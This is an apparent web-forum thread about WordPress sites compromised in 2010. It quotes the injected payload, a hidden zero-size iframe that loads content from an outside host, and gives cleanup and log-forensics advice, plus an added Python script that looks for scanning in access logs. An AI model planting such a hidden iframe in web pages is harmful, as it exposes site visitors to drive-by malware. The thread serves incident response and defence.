  1. #1
    savagepriest

    All my WordPress sites under attack 3.0.1 (different servers) XSS I think

    Hello, two of my sites were attacked by a malicious script and are now down. These two WordPress sites have been injected with this code:

    Code:
    <iframe frameborder="0" height="0" name="frame1" scrolling="no" src="http://<snip/>:8080/home/1/" width="0"></iframe>
    <!--73e181c1b8bd4e09d3bc7f39bb0cb1dd-->
    The file which was infected was under wp-includes/default-widgets.php; the last line had this code. My site autogl.com has already been banned by Firefox today. What should I do? Please help me. I want to prevent my site. Anyone else facing a similar problem?

    Check this page http://inj3ct0r.com/exploits/13702
    Last edited by Mittineague; Nov 3, 2010 at 12:34. Reason: removing mal url

  2. #2
    bluedreamer
    1. Clean up all infected files
    2. Install/upgrade to the latest version
    3. Update all passwords including your hosting control panel, FTP and WP logins
    4. Contact your host to see if they can identify how the attack took place, just in case it's a weak server setup

    ...and update your WordPress installation regularly to make sure you are fully patched.

  3. #3
    savagepriest
    I am now seeing that nearly all files have been infected, including index.php.

  4. #4
    SitePoint Enthusiast
    This could be from any number of sources. The link you provide probably isn't how they got into your website.

    However, if you have phpMyAdmin on your site, or osCommerce, OpenX, or any number of other software programs, then you should have them updated - immediately. We've been seeing a number of attacks against standard software on websites.

    If you have your access logs, look in them for a series of 404 errors where someone is scanning your site and looking for where software is installed. See what file they're looking for, then do a search on that log file to see when it returns a 200 - meaning they found it. Usually that datetime stamp will be close to when your site was hacked.

    Although, if the hackers uploaded a shell, you can't base your search on datetime stamps. Many of the shells we've been seeing have the ability to change the datetime stamp of files - to further hide their work.
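
The access-log search described in post #4, as an added example that is not part of the original thread: it finds clients with a run of 404s, collects the file names they probed, and lists every 200 later served for those names. The function names, the threshold of three 404s and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime
from pathlib import PurePosixPath

# Constructed sample in Apache/nginx "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.9 - - [02/Nov/2010:03:14:01 +0000] "GET /phpmyadmin/main.php HTTP/1.1" 404 209 "-" "-"
203.0.113.9 - - [02/Nov/2010:03:14:02 +0000] "GET /pma/main.php HTTP/1.1" 404 209 "-" "-"
203.0.113.9 - - [02/Nov/2010:03:14:03 +0000] "GET /dbadmin/main.php HTTP/1.1" 404 209 "-" "-"
198.51.100.20 - - [02/Nov/2010:03:14:04 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"
203.0.113.9 - - [02/Nov/2010:03:14:05 +0000] "GET /tools/pma/main.php HTTP/1.1" 200 4021 "-" "-"
203.0.113.77 - - [02/Nov/2010:03:20:41 +0000] "POST /tools/pma/main.php HTTP/1.1" 200 512 "-" "-"
198.51.100.20 - - [02/Nov/2010:03:21:00 +0000] "GET /missing.gif HTTP/1.1" 404 209 "-" "-"
"""

LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"[A-Z]+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def parse(log_text):
    """Yield (time, ip, path-without-query, status) for each parsable line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield ts, m["ip"], m["path"].split("?", 1)[0], int(m["status"])

def find_probe_hits(log_text, min_404=3):
    """Return (file names scanners probed, every 200 served for those names)."""
    entries = sorted(parse(log_text))
    misses = Counter()               # ip -> number of 404 responses
    names_by_ip = defaultdict(set)   # ip -> file names that returned 404
    for ts, ip, path, status in entries:
        name = PurePosixPath(path).name
        if status == 404 and name:
            misses[ip] += 1
            names_by_ip[ip].add(name)
    # A client counts as a scanner once it has min_404 or more 404s.
    probed = set().union(*(names_by_ip[ip] for ip, n in misses.items()
                           if n >= min_404))
    # Report 200s from any client: the follow-up may come from another address.
    hits = [(ts.isoformat(), ip, path) for ts, ip, path, status in entries
            if status == 200 and PurePosixPath(path).name in probed]
    return probed, hits

if __name__ == "__main__":
    print(find_probe_hits(SAMPLE_LOG))
```

Matching is by file name only, so a commonly used name such as index.php will also match ordinary traffic; treat the output as leads to check against the log rather than as a verdict.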

